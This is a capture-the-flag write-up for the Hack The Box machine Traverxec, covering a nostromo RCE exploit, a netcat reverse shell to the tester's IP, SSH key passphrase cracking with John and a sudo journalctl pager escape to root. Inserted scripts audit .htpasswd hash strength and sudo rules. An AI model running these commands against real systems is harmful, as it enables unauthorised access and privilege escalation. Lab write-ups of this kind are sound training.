HTB Traverxec

$nmap -T4 -A -p- 10.10.10.165

Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-04 10:03 CET
Nmap scan report for 10.10.10.165
Host is up (0.039s latency).
Not shown: 65533 filtered ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey: 
|   2048 aa:99:a8:16:68:cd:41:cc:f9:6c:84:01:c7:59:09:5c (RSA)
|   256 93:dd:1a:23:ee:d7:1f:08:6b:58:47:09:73:a3:88:cc (ECDSA)
|_  256 9d:d6:62:1e:7a:fb:8f:56:92:e6:37:f1:10:db:9b:ce (ED25519)
80/tcp open  http    nostromo 1.9.6
|_http-server-header: nostromo 1.9.6
|_http-title: TRAVERXEC
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 95.52 seconds

Open ports:

  • 22/tcp open ssh OpenSSH 7.9p1 Debian
  • 80/tcp open http nostromo 1.9.6

Nostromo v1.9.6 web server (http://www.nazgul.ch/dev_nostromo.html)

$searchsploit nostromo

Nostromo - Directory Traversal Remote Command Execution (Metasploit) | multiple/remote/47573.rb
nostromo 1.9.6 - Remote Code Execution | multiple/remote/47837.py
nostromo nhttpd 1.9.3 - Directory Traversal Remote Command Execution | linux/remote/35466.sh

Our web server is vulnerable to an RCE… 🙂

$searchsploit -m 47837

Exploit: nostromo 1.9.6 - Remote Code Execution
      URL: https://www.exploit-db.com/exploits/47837
     Path: /usr/share/exploitdb/exploits/multiple/remote/47837.py
File Type: Python script, ASCII text executable, with CRLF line terminators

Copied to: /home/ruben/htb/traverxec/47837.py

$python 47837.py 10.10.10.165 80 "nc -e bash 10.10.14.15 1234"
$nc -lnvp 1234

listening on [any] 1234 ...
connect to [10.10.14.15] from (UNKNOWN) [10.10.10.165] 42892

whoami

www-data

python3 -c "import pty;pty.spawn('/bin/bash')"

www-data@traverxec:/usr/bin$

We are www-data; let’s enumerate a little bit.

www-data@traverxec:/var/nostromo/conf$ ls -la

ls -la
total 20
drwxr-xr-x 2 root daemon 4096 Oct 27  2019 .
drwxr-xr-x 6 root root   4096 Oct 25  2019 ..
-rw-r--r-- 1 root bin      41 Oct 25  2019 .htpasswd
-rw-r--r-- 1 root bin    2928 Oct 25  2019 mimes
-rw-r--r-- 1 root bin     498 Oct 25  2019 nhttpd.conf

www-data@traverxec:/var/nostromo/conf$ cat .htpasswd

david:$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/
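The `$1$` prefix on that entry identifies md5crypt, a fast scheme from the 1990s that a wordlist attack of the kind shown later with John gets through quickly. As an added defensive example (not from the original writeup), the script below classifies the scheme of every `.htpasswd` entry so weak ones stand out in a review; david's line is the one shown above, and all the other sample lines are constructed.

```shell
#!/bin/sh
# Added example (not from the original writeup): classify the hashing scheme of
# each .htpasswd entry so that weak schemes stand out during a review.
# david's line is the one shown on the box; every other sample line is constructed.
SAMPLE_HTPASSWD='david:$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/
alice:$2y$10$abcdefghijklmnopqrstuu
bob:$apr1$saltsalt$hashhashhashhashhashhas
carol:{SHA}Zm9vYmFy
dave:ab1cdEfgHijkl
erin:plaintextpassword'

# hash_scheme HASH -> prints the scheme name derived from the hash prefix.
# The 13-character rule for traditional DES crypt is a heuristic (assumption):
# a 13-character plaintext password would be misreported as descrypt.
hash_scheme() {
  h="$1"
  case "$h" in
    '$2a$'*|'$2b$'*|'$2y$'*) echo bcrypt ;;
    '$6$'*)    echo sha512crypt ;;
    '$5$'*)    echo sha256crypt ;;
    '$apr1$'*) echo apr1-md5 ;;
    '$1$'*)    echo md5crypt ;;
    '{SHA}'*)  echo sha1 ;;
    *) if [ "${#h}" -eq 13 ]; then echo descrypt; else echo plain; fi ;;
  esac
}

# is_weak SCHEME -> exit 0 when the scheme is fast or unsalted and falls to a
# wordlist quickly (md5crypt, apr1, sha1, descrypt, plain); bcrypt and the
# sha*crypt family return 1.
is_weak() {
  case "$1" in
    bcrypt|sha512crypt|sha256crypt) return 1 ;;
    *) return 0 ;;
  esac
}

# audit_htpasswd FILE -> prints "user<TAB>scheme<TAB>WEAK|ok" per entry and
# returns the number of weak entries as its exit status (0 = nothing to fix).
audit_htpasswd() {
  weak=0
  while IFS=: read -r user hash; do
    [ -n "$user" ] || continue
    scheme=$(hash_scheme "$hash")
    if is_weak "$scheme"; then
      printf '%s\t%s\tWEAK\n' "$user" "$scheme"
      weak=$((weak + 1))
    else
      printf '%s\t%s\tok\n' "$user" "$scheme"
    fi
  done < "$1"
  return "$weak"
}

# Run against a real file when given one, e.g.:
#   sh htpasswd_audit.sh /var/nostromo/conf/.htpasswd
if [ "$#" -gt 0 ]; then
  audit_htpasswd "$1"
fi
```

Run on the constructed sample, five of the six entries are reported as WEAK and only alice's bcrypt hash passes; the exit status doubles as a finding count so the script can gate a config check. The fix on the server side is the same in every case: regenerate the entries with bcrypt (or at least sha512crypt) and make sure the file is not readable by the web server's own account, as it was here.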

$chmod 600 david.key
$ssh -i david.key david@10.10.10.165

Enter passphrase for key 'david.key':

The key is protected with a passphrase, but we can crack it using John.

$python /usr/share/john/ssh2john.py david.key > david_key.hash
$john david_key.hash --wordlist=/usr/share/wordlists/rockyou.txt

Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 2 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
hunter           (david.key)
1g 0:00:00:06 96,37% (ETA: 13:23:03) 0.1663g/s 2303Kp/s 2303Kc/s 2303KC/s 08131517..0813137355

$ssh -i david.key david@10.10.10.165

Enter passphrase for key 'david.key': 
Linux traverxec 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u1 (2019-09-20) x86_64
david@traverxec:~$

david@traverxec:~$ ls

bin public_www user.txt

david@traverxec:~$ cat user.txt

7db0XXXXXXXXXXXXXXXXXXXXXXXXXXXX

david@traverxec:~/bin$ cat server-stats.sh

#!/bin/bash

cat /home/david/bin/server-stats.head
echo "Load: `/usr/bin/uptime`"
echo " "
echo "Open nhttpd sockets: `/usr/bin/ss -H sport = 80 | /usr/bin/wc -l`"
echo "Files in the docroot: `/usr/bin/find /var/nostromo/htdocs/ | /usr/bin/wc -l`"
echo " "
echo "Last 5 journal log lines:"
/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service | /usr/bin/cat 
david@traverxec:~/bin$

david@traverxec:~/bin$ ./server-stats.sh

Load:  07:39:46 up  3:38,  1 user,  load average: 0.00, 0.01, 0.00
 
Open nhttpd sockets: 2
Files in the docroot: 117
 
Last 5 journal log lines:
-- Logs begin at Fri 2020-12-04 04:01:12 EST, end at Fri 2020-12-04 07:39:46 EST. --
Dec 04 04:01:14 traverxec systemd[1]: Starting nostromo nhttpd server...
Dec 04 04:01:14 traverxec nhttpd[421]: started
Dec 04 04:01:14 traverxec nhttpd[421]: max. file descriptors = 1040 (cur) / 1040 (max)
Dec 04 04:01:14 traverxec systemd[1]: Started nostromo nhttpd server.

/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service | /usr/bin/cat 

Journalctl is a utility for querying and displaying logs from journald, systemd’s logging service.

https://www.loggly.com/ultimate-guide/using-journalctl/

david@traverxec:~/bin$ ls -la /usr/bin/journalctl

-rwxr-xr-x 1 root root 67672 Aug 20 2019 /usr/bin/journalctl

According to the journalctl man page:

The output is paged through less by default, and long lines are "truncated" to screen width. The hidden part can be viewed by using the left-arrow and right-arrow keys. Paging can be disabled; see the --no-pager option and the "Environment" section below.

And, according to the help screen of less,

!command      Execute the shell command with $SHELL.

so !command can be used to run a shell command from inside the pager.

More information can be found here: https://gtfobins.github.io/gtfobins/journalctl/
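The root cause is the sudo grant rather than the script: server-stats.sh pipes journalctl into cat, but whoever is allowed to run that journalctl command through sudo can also run it on its own, in a terminal, where the output gets paged through less and its `!command` escape runs as root. As an added defensive example (not from the original writeup), the script below checks rule or script lines for journalctl calls that can still reach the pager and shows the hardened form, with `--no-pager` inside the permitted command. The actual sudoers rule on the box is not shown in the writeup, so both rules in the script are constructed assumptions modelled on the command the script runs.

```shell
#!/bin/sh
# Added example (not from the original writeup): flag journalctl invocations that
# can still hand the caller an interactive pager, and show the hardened form.
# The sudoers rule on the box is not shown in the writeup; the two rules below are
# constructed assumptions that match the command server-stats.sh runs under sudo.
WEAK_RULE='david ALL=(root) NOPASSWD: /usr/bin/journalctl -n5 -unostromo.service'
HARDENED_RULE='david ALL=(root) NOPASSWD: /usr/bin/journalctl --no-pager -n5 -unostromo.service'

# pager_reachable LINE -> exit 0 when a journalctl call on LINE may start less.
# journalctl pages through less whenever stdout is a terminal unless --no-pager
# is present (SYSTEMD_PAGER or PAGER would also disable it, but sudo resets the
# environment by default, so the flag has to live in the permitted command).
# A trailing "| cat" inside a script does not count: the user can run the
# permitted sudo command directly, without the pipe.
pager_reachable() {
  case "$1" in
    *journalctl*--no-pager*) return 1 ;;
    *journalctl*)            return 0 ;;
    *)                       return 1 ;;
  esac
}

# audit_rules FILE -> prints each line whose journalctl call can reach the pager
# and returns their count as the exit status; blank lines and comments are skipped.
audit_rules() {
  count=0
  while IFS= read -r rule; do
    case "$rule" in ''|'#'*) continue ;; esac
    if pager_reachable "$rule"; then
      printf 'pager reachable: %s\n' "$rule"
      count=$((count + 1))
    fi
  done < "$1"
  return "$count"
}

# Usage against a copy of the relevant sudoers fragment or a shell script, e.g.:
#   sh pager_audit.sh /path/to/sudoers-fragment
if [ "$#" -gt 0 ]; then
  audit_rules "$1"
fi
```

Pointed at server-stats.sh the check flags the journalctl line as well, and that is the right answer: the pipe to cat protects only that script, not the grant behind it. With `--no-pager` baked into the sudoers command the user still gets the five log lines the script needs, but there is no pager and therefore no shell escape to reach.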

There is a trick here related to less, and that is how this result is obtained. I got stuck here for a long time, but it was funny when I realized 🙂

root@traverxec:/home/david/bin# cat /root/root.txt

9aa3XXXXXXXXXXXXXXXXXXXXXXXXXXXX
